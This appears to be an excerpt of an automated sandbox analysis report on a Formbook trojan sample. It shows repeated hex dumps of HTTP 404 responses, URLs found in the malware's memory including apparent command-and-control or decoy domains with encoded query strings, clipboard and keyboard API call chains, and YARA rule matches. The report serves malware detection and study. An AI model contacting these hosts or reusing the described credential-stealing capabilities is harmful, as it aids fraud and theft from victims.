            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 10:52:48 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 10:52:50 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 10:52:53 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Oct 2024 10:52:55 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
            Source: sc.exe, 00000004.00000002.4571993110.0000000004F48000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003EE8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://kx507945.shop
            Source: sc.exe, 00000004.00000002.4571993110.000000000476E000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000370E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://patioprojex.africa/x557/?5vc=giAstKbG1JvvSEHvPZxdSSM3KyfVinJMbmE6i5V8cuPr9HW8zP8h8UUcUfsu4P3t
            Source: sc.exe, 00000004.00000002.4571993110.00000000050DA000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000407A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.365seo.cc
            Source: YKSXcXcWryn.exe, 00000008.00000002.4572880167.0000000005034000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online
            Source: YKSXcXcWryn.exe, 00000008.00000002.4572880167.0000000005034000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/8l0y/
            Source: sc.exe, 00000004.00000002.4571993110.0000000005722000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4574024269.0000000006440000.00000004.00000800.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/px.js?ch=1
            Source: sc.exe, 00000004.00000002.4571993110.0000000005722000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4574024269.0000000006440000.00000004.00000800.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/px.js?ch=2
            Source: sc.exe, 00000004.00000002.4571993110.0000000005722000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4574024269.0000000006440000.00000004.00000800.00020000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.crochetpets.online/sk-logabpstatus.php?a=N1hkU2g1d01yTW5xcHU0dEhSdTg5bTZpTnJKR2xVNFNMQ2hU
            Source: sc.exe, 00000004.00000002.4571993110.0000000004DB6000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003D56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.tempmai.lol/m2fa?gp=1&js=1&uuid=1728557616.0093649002&other_args=eyJ1cmkiOiAiL20yZmEiLCAi
            Source: YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003D56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www70.tempmai.lol/
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000046C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sc.exe, 00000004.00000002.4571993110.0000000004900000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.00000000038A0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: sc.exe, 00000004.00000002.4568890860.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sc.exe, 00000004.00000002.4568890860.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sc.exe, 00000004.00000003.2454985516.0000000007E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: sc.exe, 00000004.00000002.4568890860.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sc.exe, 00000004.00000002.4568890860.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033L
            Source: sc.exe, 00000004.00000002.4568890860.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sc.exe, 00000004.00000002.4568890860.000000000314B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sc.exe, 00000004.00000002.4571993110.0000000004C24000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003BC4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=turbonotes.app
            Source: sc.exe, 00000004.00000002.4571993110.00000000053FE000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000439E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
            Source: sc.exe, 00000004.00000002.4571993110.00000000045DC000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000357C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bayarcepat19.click/fxts/?5vc=KBrNmZFmj0ul2oD2qgnroh/wQ2h5AjW2d9F4abtF0F4CaovzTwTYRyu6Dyk
            Source: sc.exe, 00000004.00000002.4574151848.0000000007E88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sc.exe, 00000004.00000002.4571993110.0000000004C24000.00000004.10000000.00040000.00000000.sdmp, sc.exe, 00000004.00000002.4571993110.00000000053FE000.00000004.10000000.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.000000000439E000.00000004.00000001.00040000.00000000.sdmp, YKSXcXcWryn.exe, 00000008.00000002.4570830422.0000000003BC4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\foljNJ4bug.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2274082509.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568673306.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4568820851.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4570541782.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2275048061.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4572880167.0000000004F80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4568347661.0000000002B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2274511503.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
